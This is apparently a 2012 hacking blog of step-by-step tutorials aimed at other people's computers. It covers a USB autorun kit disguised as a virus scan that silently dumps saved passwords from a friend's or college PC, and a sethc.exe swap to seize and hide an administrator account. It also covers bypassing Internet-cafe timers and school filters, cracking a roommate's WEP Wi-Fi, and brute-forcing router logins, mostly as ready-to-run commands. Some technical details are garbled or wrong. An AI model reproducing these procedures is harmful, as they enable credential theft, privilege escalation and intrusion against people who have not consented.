Sunday, 4 November 2012

How to Hack passwords using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend’s/college Computer.
We need the following tools to create our rootkit:
 
MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
 
Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.
 
IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0
 
Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…
 
PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.
------------------------------------- ------------------------------------------------------
Here is a step by step procedre to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
 
1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.
 
2. Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
 
3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend’s PC or on your college computer. Just follow these steps

 
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).
 
2. In the pop-up window, select the first option (Perform a Virus Scan).
 
3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.

How To Hack An Administrator Account With A Guest Account

 The only way this is going to work is if your account has permission to mody files in folder
«system32»)
Ever wanted to hack your college pc with guest account/student account so that you
can download with full speed Hack Administrator !!!!there ? or just wanted to hack
your friend’s pc to make him gawk when you tell your success story of hacking ?
well,there is a great way of hacking an administrator account from a guest account by
which you can reset the administrator password and getting all the privilages an
administrator enjoys on windows.. Interested ? read on…

Concept
Press shift key 5 times and the sticky key dialog shows up.This works even at the
logon screen. But If we replace the sethc.exe which is responsible for the sticky key
dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon
screen,we will get a command prompt with administrator privilages because no user
has logged on. From there we can hack the administrator password,even from a guest
account.

Prerequisites
Guest account with write access to system 32.
Here is how to do that -


* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the
file,then click yes.
When asked to overwrite, overwrite the sethc.exe.
* Now Log out from your guest account and at the user select window,press shift key
5 times.
* Instead of Sticky Key confirmation dialog,command prompt with full administrator
privileges will open.




















Press shift key 5 times and command prompt will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password
you like and press enter.
* You will see “ The Command completed successfully” and then exit the command
prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.

 Further..
Also, you can further create a new user at the command prompt by typing “NET USER
Ephemeral /ADD” where “Ephemeral” is the username you would like to add with
administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created
for your admin account and live with your admin account forever :)

Thursday, 1 November 2012

How to get unlimited time in Internet Café's

Today we're going to learn how to disable the timer on the computers in Internet
Cafe's.
Let's go through the steps, shall we?

1. Create a New Text Document.

2. Then type CMD in it.

3. And then save it as anything.bat
(Make sure the file do NOT end on .txt, but on .bat)

4. Go to the location were you saved the .bat file and run it. If you've done this
correctly, you'll see that Command Prompt is open.

5. Now that Command Prompt is open, type in: cd\windows
(This will change the directory to Windows)

6. Then type in: regedit
(This will get you to the registry editor gui)

7. Now navigate to:
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current
version>internet settings>policies>system


8. Then on the right pane where it says Disable Taskmanager, right click on it, and
scroll down to modify, and than change the value of it to "0".

9. And then open Windows Task Manager
(CTRL+ALT+DELETE)

10. And then disable the Internet Cafe's timer.
If you did this right, then you're done! Well done :D

How to get past your school blocking system without programs

Right, first off, you need to go onto:http://g.ho.st/
This is a virtual machine/ computer that your sysadmins shouldn't have blocked. At
my school, our security is pretty high because of people like me and you. After you
are on the website, it should look like this:

 Ok, now you click on the big button that says: Start. Then, after that, you should see
another screen that looks like this:
















Now make an account, you should see the register button. I have made an account,
(trust me, it is easy). After you have logged in, you should see another screen that
looks something like this:
















After you have got logged in, you should try and get on the g.ho.st internet (alpha), to
get on the internet, follow these commands.
on the desktop, click on the icon that says: find cool web stuff.
Then click the icon that says: Web.
Now go to: Ghost services.
And there should be a icon that says: G.ho.st browser (alpha).
(If you go on a website, and it says: open in a new tab because this site will function
better, (or something like that) don't do it. But if you want to, just do it).

How To Crack WEP In Linux

Im using Ubutnu 8.10, but all the commands are compatible with all other Linux Distros.

1. Open terminal
Sudo -s
(Enter Password)
apt-get install aircrack-ng (Here shows lots of cool shenanigans in verbose mood, just
enjoy)
Note: it might prompt you with something like "this file will take 8995kb.. do u wish
to install [Y/N]" (Correct Answer Being Y for yes)
Alright, you have just installed aircrack-ng on your computer, congratulations!

2. Ifconfig wlan0 down
this command puts your wireless card into "monitor mode." if this line doesnt work
for you, try "ifconfig ath0 down" or the connection type you are using. im going to
continue using wlan0 as that applies to me, you will just replace wlan0 with your
specific device code.
OR iwconfig wlan0 mode monitor if neither of the above work for you. once again,
depends on your computer.

3. Your goal now is to find your target, my goal is my roommates wireless router which
is using WEP encryption, how convenient!
first, for educational purposes, type airodump-ng into terminal, this shows all the
commands airodump is capable of, very important if you want to go after something a
tad different or specific
We want to find the target, type airodump-ng --showack wlan0







                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                 We see that the target Essid is "Rob and Big" the encryption type is WEP, the
BSSID number is "00:22:15:23:6E:E2", and finally the channel number is 11

you must know the enemy well if you want to hack it successfully.

know that we know all this very important information, we shall begin our attack!
airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0
holy shnap! that was alot!, here is what we just did.

-w ->saves all the important stuff to a file (first being the file name)
--showack ->shows some cool information, idk, i like it just cause its always changing,
not really necessary
--berlin 3000 -> keeps the cool numbers on the screen even longer, like i said, not
totally important, but defiantly looks cool! (3000 being the time the numbers are kept
on the screen)
--bssid ->defines to the program what bssid (the router) you want to specifically
capture packets from
-C -> Defines what channel the program to stay on (instead of surfing all 12, it just
monitors one now)

wow! amazing, tons of cool numbers pop up and entertain us! whooo hooo!
what is actually happening is that the program is capturing packets and saving them to
the file you defined above (First)

so break out a can of chef boyardee and chow away, cause its going to be awhile.

You are actually wanting for the number under #Data at the time to reach ~ 10000
to 100000, the more data is being transfered over the network, the faster this will
go.
---
Dude! that number is not going up very fast / or, very very very slow!
Skip to the bottom, i will explain and how to 'fix that'
--
Fantastic! you have ~ 10000 packets and a full stomach, what now?
you have all this information, now you need to decipher it (more commonly know as
'cracking')

KEEP THE AIRODUMP-NG TERMINAL OPEN!
open a new terminal and type
sudo -s
(enter password)
aircrack-ng -a 1 -b 00:22:15:23:6E:E2 First.cab
Cool! what did i just do?
aircrack-ng -> cracking program, can crack WEP and WPA passcodes
-a -> Set the attack mode to WEP (2 is WPA)
-b -> is the network we are attacking (the bssid is 00:22:15:23:6E:E2)
First.cab -> the file airodump saved all the important shenagians to. (note, the
program automatically saves the file as *.cab file)

wait..
wait..
wait..

BAM! the password! Congratulations, you have just won the game.

or

plz collect 5000 more packets, (this is why you left airodump-ng open.) aircrack-ng
will automatically re-attempt to crack again after airodump-ng has collected 5000
more packets. so more chef boyardee, and some more patience...
---

#Data is going slooowwwwwwwww!!! HELP ME!
this is because the user is not actively using the network, you have a choice, wait till
he starts using the network again or 'assist' the network on giving you the packets
you need.

now, this is going to be quite a hassel, but stick with it.
apt-get install macchanger

stop the airodump-ng from working. (i just hit ctrl+c and it stops)
ifconfig wlan0 down

>> the top half of the screen of the terminal of the airodump tell you the network you
are gathering packets for, the bottom half lists mac addresses. important!

with the picture above, im going to use the mac address 00:22:3F:7B:D5:2C
so, macchanger -m 00:22:3F:7B:D5:2C wlan0

Now, your mac address is the same as a computer already accepted by the router!
oooo... awwwww..
now, we get to play with a program called aireplay-ng!
aireplay-ng -3 -b 00:22:15:23:6E:E2 -h 00:22:3F:7B:D5:2C wlan0

--What just happened?
aireplay-ng works buy injecting packets into the router so u get more traffic btwn
the computers. (speeds up the packet retrieval on the airodump-ng side)
-3 is the attack type '00:22:3F:7B:D5:2C' i just explained what i did above
-b is the enemy bssid '00:22:15:23:6E:E2'
-h is your spoofed (faked) mac addresss '00:22:3F:7B:D5:2C'

now, it will start injecting packets.. now start up airodump again and wait some more!
airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0
(just in case you lost it)

WOW! that, is how to crack a WEP key. i hoped you enjoyed this tut.

How to Crack a WEP Encrypted Wireless Network on Windows Vista

First you can only use this method to crack a WEP encrypted network. WEP has been
replaced by WPA encryption which is stronger but can still be cracked, just not as
easily. To find out if the network you want to crack is WEP encryption, simply view
the wireless networks in the Connect to a network box and hold your mouse over the
network of choice. A little box will tell you the encryption. If it say WEP - good we
can proceed, if it says anything else this tutorial wont help.

First to understand what you will be doing. You will be using a program to capture
packets and then use another program to analyze those packets and crack the key,
thus allowing you to have access to their network. To capture packets (data from the
network we are trying to crack) you must have the program running on your computer
and you must capture about 200 000 or more IV packets (a special type of packet). I
will show you how to capture the correct type of packets.
 
Also ONLY certain types of wireless cards can actually capture wireless packets. In
order to capture packets your wireless card must be able to go into monitor mode,
not every driver or every wireless card supports monitor mode. In most cases you will
have to download a special driver designed for your wireless card to put it into
monitor mode. I had to purchase a new wireless card because mine was not supported.
The program you will be using has a list of supported wireless cards and comes with
the drivers needed (Lucky you)
 
Ok, down to business. First the program you need to capture packets can be
downloaded from this link http://www.tamos.com/download/main/ca.php
 
Next the program to analyze the packets and finger out the password can be
downloaded from my own site. I got it to work for windows vista and then zipped it all
into a folder for you. To get this to run all you have to do is extract it, open the
aircrack folder, then open the bin folder, then double click on Aircrack-ng GUI.exe.
Here is the download link http://www.howtovideos.ca/images/aircrackVista.rar just
click it and save the file.
 
Now for the dirty work, keep in mind this could take a few days to capture enough
packets. First install the Commview for Wifi program. You do this by extracting the
setup file from the file we downloaded earlier (ca6.zip) Then double click setup.exe
and follow the prompts. When Commview opens for the first time it has a driver
installations guide. This replaces the old driver with a newer, better, and more
improved version! Hooray. Follow the prompts to install your new driver and now we
are ready to capture. If everything has gone as planned when you open Commview for
Wifi the little play button in the top left corner will be blue. If it is not blue the
driver has not been installed properly. Moving on…

Click the blue button in the top left corner and then click Start Scanning. Commview
for Wifi now starts scanning each channel looking for data that is being sent. It will
list each network it finds. Now click each host until you find the name of the network
key you are trying to find. Now select the appropriate channel (my network is
broadcasting on channel 6 so I will start capturing all data on channel 6) Click
capture.

Commview for Wifi is now capturing all the packets being sent over channel 6. Once
Commview for Wifi collects enough packets aircrack can analyze them and crack the
wireless key. The thing is, you only need certain packets, and if you collect too many
unneeded packets aircrack may get confused. To help make things easier follow the
next few steps.

First of all we only want packets from one host, not all of them. As you can see from
my screenshot below I am collecting packets from 7 different network. (see
screenshot below)A few are WPA encrypted so they and a few are WEP. I really only
want to collect data being sent from one network, so in order to do this all you have
to do is right click on the wireless network you want to crack and select copy mac
address.

Now click on the rules tab. On the left side under simple rules click MAC Addresses.
For action select Capture, and for Add Record select both. Now click inside the entry
form box and hit ctrl+v (to paste the mac address) or right click and select paste.
Now hit add MAC Address.

What we just did is make a rule so that Commview for Wifi will only capture packets
coming from a certain MAC Address (the one we want) Great almost done.

Now to make things even easier for Aircrack you only want to capture DATA packets.
There are 3 types to select from Management packets, Data Packets and Control
Packets. We only want Data packets because that is where the information is that
Aircrack needs to crack the wireless encryption passkey. Simply select the D, and
unselect the M and the C.

Now Commview for Wifi is only capturing Data Packets. To be more specific
Commview for Wifi is only capturing Data Packets to and from a specific MAC
address. Now that everything is set up to capture the right types of packets we
should start saving the logs.

You have to save all of the packets into a log for Aircrack to analyze them. You can
set Commview for Wifi to save them automatically, or just save them yourself
periodically. It is a good idea to have them auto save because it splits them into nicely
sized logs, and if you accidentally close Commview for Wifi they will save and you
wont lose all your packets! To do that just go to the logging tab and enable auto
saving. You can change the settings if you would like (I recommend increasing the
maximum directory size to something like 100000).

And now we wait… We have to capture over 15000 IV packets. Because we set up
some rules most of the packets we capture will be IV packets (these are a certain
type of Data packet with information used to crack the wireless key). It took me
about 4 days to capture enough packets, but I was not running Commview for Wifi non
stop. If you are close to the network and there is heavy traffic, it may only take you
a few hours. Ok what do you do now?
Alright, so now 20000 packets (or more) later we are ready to crack the WEP
wireless key. First lets converts all of the log files to .cap format (shown in
screenshot below) When I cracked my first WEP key with this method I had 4 log
files and about 220 000 packets.Go to wherever you have your log files saved and
double click to open it. Now click on file -> Export Logs -> Tcpdump Format

Save it as 1.cap do the rest of your logs, saving them in sequential order 1.cap, 2.cap,
3.cap etc.
Now that you have all of your log files saved in .cap format lets open Aircrack. Open
the aircrack folder (wherever you extracted it) then open the Bin folder, now double
click Aircrack-ng GUI.exe. Aircrack will open, click the choose button and navigate to
where you have your log files saved. To select all of your log files ( saved in .cap
format) Hold down CTRL and click each file, Then hit open.
Now click launch, Aircrack shows you all of the different BSSID’s that it captured
data from and assigns an index number to each one, then it asks you Index number of
target network? You want to enter the number of the network you want to crack.
Mine is called CrackMePlease so I am selecting 15.
Enter the index number and then press enter, if you have enough IV’s then it should
give you the WEP key. If not go back and capture more and try again.
That’s all

How To Crack A Router For Username and Password


(I will be using Brutus to crack a D-Link route.)
1) When we want to access our router,it will be password protected.We can try the
default username and password.












As you can see,it is password protected.
2) I will open up my Brutus.




































3)Configure Brutus.Put the target as the router's IP address.Put in the userlist and
the passlist.After everything is OK,press on START.



















As you can see from the picture above, Brutus is cracking the router.
4)Wait for Brutus to finish cracking the router.You will get this result.




















You can see that i have get my username and password for the router.
5)Go to the page and type in the username and password.